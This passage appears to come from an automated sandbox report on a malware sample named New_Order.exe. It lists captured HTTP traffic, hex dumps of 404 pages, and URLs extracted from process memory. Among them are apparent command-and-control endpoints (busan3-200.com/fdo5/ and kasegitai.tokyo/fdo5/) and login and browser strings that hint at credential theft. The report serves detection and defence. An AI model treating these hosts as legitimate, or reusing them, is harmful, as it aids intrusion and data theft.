72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 6
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundcontent-type: text/htmlserver: Microsoft-IIS/10.0x-powered-by: ASP.NETdate: Sun, 03 Dec 2023 15:26:35 GMTcontent-length: 1245connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 
72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 6
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundcontent-type: text/htmlserver: Microsoft-IIS/10.0x-powered-by: ASP.NETdate: Sun, 03 Dec 2023 15:26:38 GMTcontent-length: 1245connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 
72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 6
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Sun, 03 Dec 2023 15:26:44 GMT Server: Apache Content-Length: 5278 Connection: close Content-Type: text/html
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Sun, 03 Dec 2023 15:26:47 GMT Server: Apache Content-Length: 5278 Connection: close Content-Type: text/html
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Sun, 03 Dec 2023 15:26:50 GMT Server: Apache Content-Length: 5278 Connection: close Content-Type: text/html
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Sun, 03 Dec 2023 15:26:52 GMT Server: Apache Content-Length: 5278 Connection: close Content-Type: text/html; charset=utf-8
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Sun, 03 Dec 2023 15:26:58 GMT Connection: close Content-Length: 4857
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Sun, 03 Dec 2023 15:27:01 GMT Connection: close Content-Length: 4857
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Sun, 03 Dec 2023 15:27:04 GMT Connection: close Content-Length: 4857
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Sun, 03 Dec 2023 15:27:07 GMT Connection: close Content-Length: 4990
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Sun, 03 Dec 2023 15:28:21 GMT Server: Apache Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Sun, 03 Dec 2023 15:28:23 GMT Server: Apache Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Sun, 03 Dec 2023 15:28:26 GMT Server: Apache Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Sun, 03 Dec 2023 15:28:29 GMT Server: Apache Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
            Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: wextract.exe, 00000013.00000003.2041629441.0000000007E33000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
            Source: wextract.exe, 00000013.00000003.2041629441.0000000007E33000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
            Source: wextract.exe, 00000013.00000003.2041629441.0000000007E33000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
            Source: wextract.exe, 00000013.00000003.2041629441.0000000007E33000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
            Source: wextract.exe, 00000013.00000003.2041629441.0000000007E33000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
            Source: wextract.exe, 00000013.00000003.2041629441.0000000007E33000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
            Source: wextract.exe, 00000013.00000003.2041629441.0000000007E33000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
            Source: wextract.exe, 00000013.00000003.2041629441.0000000007E33000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
            Source: wextract.exe, 00000013.00000003.2041629441.0000000007E33000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
            Source: wextract.exe, 00000013.00000003.2041629441.0000000007E33000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
            Source: wextract.exe, 00000013.00000003.2041629441.0000000007E33000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
            Source: wextract.exe, 00000013.00000003.2041629441.0000000007E33000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
            Source: wextract.exe, 00000013.00000002.4167723777.0000000005886000.00000004.10000000.00040000.00000000.sdmp, MxIFbOJlQLdXkFqAx.exe, 00000017.00000002.4166780563.0000000002D16000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2093049974.000000000C436000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://img.sedoparking.com
            Source: wextract.exe, 00000013.00000003.2041629441.0000000007E33000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
            Source: wextract.exe, 00000013.00000003.2041629441.0000000007E33000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
            Source: wextract.exe, 00000013.00000003.2041629441.0000000007E33000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0N
            Source: wextract.exe, 00000013.00000003.2041629441.0000000007E33000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
            Source: New_Order.exe, 00000000.00000002.1755763102.0000000002D50000.00000004.00000800.00020000.00000000.sdmp, QjSljS.exe, 0000000B.00000002.1805856527.0000000002431000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: New_Order.exe, 00000000.00000002.1761464417.0000000006C62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
            Source: wextract.exe, 00000013.00000002.4167723777.00000000061F2000.00000004.10000000.00040000.00000000.sdmp, MxIFbOJlQLdXkFqAx.exe, 00000017.00000002.4166780563.0000000003682000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.busan3-200.com:80/fdo5/?fXUX=ShJ8DFcXvtj84pw&540H2x=o5wSqUvF0rpSj/QsxVSIlr771lB1q2yaU
            Source: New_Order.exe, 00000000.00000002.1761464417.0000000006C62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
            Source: wextract.exe, 00000013.00000003.2041629441.0000000007E33000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
            Source: New_Order.exe, 00000000.00000002.1761464417.0000000006C62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
            Source: New_Order.exe, 00000000.00000002.1761464417.0000000006C62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
            Source: New_Order.exe, 00000000.00000002.1761464417.0000000006C62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
            Source: New_Order.exe, 00000000.00000002.1761464417.0000000006C62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
            Source: New_Order.exe, 00000000.00000002.1761464417.0000000006C62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
            Source: New_Order.exe, 00000000.00000002.1761464417.0000000006C62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
            Source: New_Order.exe, 00000000.00000002.1761464417.0000000006C62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
            Source: New_Order.exe, 00000000.00000002.1761464417.0000000006C62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
            Source: New_Order.exe, 00000000.00000002.1761464417.0000000006C62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
            Source: New_Order.exe, 00000000.00000002.1761464417.0000000006C62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
            Source: New_Order.exe, 00000000.00000002.1761464417.0000000006C62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
            Source: New_Order.exe, 00000000.00000002.1761464417.0000000006C62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
            Source: New_Order.exe, 00000000.00000002.1761464417.0000000006C62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
            Source: New_Order.exe, 00000000.00000002.1761464417.0000000006C62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
            Source: New_Order.exe, 00000000.00000002.1761464417.0000000006C62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
            Source: New_Order.exe, 00000000.00000002.1761464417.0000000006C62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
            Source: MxIFbOJlQLdXkFqAx.exe, 00000017.00000002.4168479789.0000000004CF8000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.kasegitai.tokyo
            Source: MxIFbOJlQLdXkFqAx.exe, 00000017.00000002.4168479789.0000000004CF8000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.kasegitai.tokyo/fdo5/
            Source: New_Order.exe, 00000000.00000002.1761464417.0000000006C62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
            Source: New_Order.exe, 00000000.00000002.1761464417.0000000006C62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
            Source: New_Order.exe, 00000000.00000002.1761464417.0000000006C62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
            Source: New_Order.exe, 00000000.00000002.1761464417.0000000006C62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
            Source: New_Order.exe, 00000000.00000002.1761464417.0000000006C62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
            Source: New_Order.exe, 00000000.00000002.1761464417.0000000006C62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
            Source: New_Order.exe, 00000000.00000002.1761464417.0000000006C62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
            Source: wextract.exe, 00000013.00000002.4169629780.0000000007D38000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: wextract.exe, 00000013.00000003.2041629441.0000000007E33000.00000004.00000020.00020000.00000000.sdmp, wextract.exe, 00000013.00000003.2092892717.0000000008493000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aus5.mozilla.org/update/6/%PRODUCT%/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL%/%
            Source: wextract.exe, 00000013.00000002.4169629780.0000000007D38000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: wextract.exe, 00000013.00000002.4169629780.0000000007D38000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: wextract.exe, 00000013.00000002.4169629780.0000000007D38000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: wextract.exe, 00000013.00000003.2041629441.0000000007E33000.00000004.00000020.00020000.00000000.sdmp, wextract.exe, 00000013.00000003.2092892717.0000000008493000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://crash-reports.mozilla.com/submit?id=
            Source: wextract.exe, 00000013.00000002.4169629780.0000000007D38000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: wextract.exe, 00000013.00000002.4169629780.0000000007D38000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: wextract.exe, 00000013.00000002.4169629780.0000000007D38000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: wextract.exe, 00000013.00000002.4167723777.0000000006060000.00000004.10000000.00040000.00000000.sdmp, MxIFbOJlQLdXkFqAx.exe, 00000017.00000002.4166780563.00000000034F0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Montserrat:200
            Source: wextract.exe, 00000013.00000002.4167723777.0000000005BAA000.00000004.10000000.00040000.00000000.sdmp, MxIFbOJlQLdXkFqAx.exe, 00000017.00000002.4166780563.000000000303A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Montserrat:400
            Source: wextract.exe, 00000013.00000002.4169473954.0000000007A60000.00000004.00000800.00020000.00000000.sdmp, wextract.exe, 00000013.00000002.4167723777.0000000006384000.00000004.10000000.00040000.00000000.sdmp, MxIFbOJlQLdXkFqAx.exe, 00000017.00000002.4166780563.0000000003814000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Source
            Source: wextract.exe, 00000013.00000003.2041629441.0000000007E33000.00000004.00000020.00020000.00000000.sdmp, wextract.exe, 00000013.00000003.2092892717.0000000008493000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881
            Source: wextract.exe, 00000013.00000003.2041629441.0000000007E33000.00000004.00000020.00020000.00000000.sdmp, wextract.exe, 00000013.00000003.2092892717.0000000008493000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://incoming.telemetry.mozilla.org/submit/firefox-launcher-process/launcher-process-failure/1/
            Source: wextract.exe, 00000013.00000002.4165061927.0000000003484000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: wextract.exe, 00000013.00000002.4165061927.0000000003484000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: wextract.exe, 00000013.00000002.4165061927.0000000003484000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: wextract.exe, 00000013.00000002.4165061927.0000000003484000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
            Source: wextract.exe, 00000013.00000002.4165061927.0000000003484000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: wextract.exe, 00000013.00000002.4165061927.0000000003462000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: wextract.exe, 00000013.00000003.2036325732.0000000007D26000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
            Source: wextract.exe, 00000013.00000003.2041629441.0000000007E33000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mozilla.org0/
            Source: wextract.exe, 00000013.00000002.4169473954.0000000007A60000.00000004.00000800.00020000.00000000.sdmp, wextract.exe, 00000013.00000002.4167723777.0000000006384000.00000004.10000000.00040000.00000000.sdmp, MxIFbOJlQLdXkFqAx.exe, 00000017.00000002.4166780563.0000000003814000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://nl.trustpilot.com/review/www.transip.nl
            Source: MxIFbOJlQLdXkFqAx.exe, 00000017.00000002.4166780563.0000000003814000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://transip.eu/
            Source: wextract.exe, 00000013.00000002.4169473954.0000000007A60000.00000004.00000800.00020000.00000000.sdmp, wextract.exe, 00000013.00000002.4167723777.0000000006384000.00000004.10000000.00040000.00000000.sdmp, MxIFbOJlQLdXkFqAx.exe, 00000017.00000002.4166780563.0000000003814000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://transip.eu/cp/
            Source: MxIFbOJlQLdXkFqAx.exe, 00000017.00000002.4166780563.0000000003814000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://transip.nl/
            Source: wextract.exe, 00000013.00000002.4169473954.0000000007A60000.00000004.00000800.00020000.00000000.sdmp, wextract.exe, 00000013.00000002.4167723777.0000000006384000.00000004.10000000.00040000.00000000.sdmp, MxIFbOJlQLdXkFqAx.exe, 00000017.00000002.4166780563.0000000003814000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://transip.nl/cp/
            Source: wextract.exe, 00000013.00000002.4169473954.0000000007A60000.00000004.00000800.00020000.00000000.sdmp, wextract.exe, 00000013.00000002.4167723777.0000000006384000.00000004.10000000.00040000.00000000.sdmp, MxIFbOJlQLdXkFqAx.exe, 00000017.00000002.4166780563.0000000003814000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://trustpilot.com/review/www.transip.nl
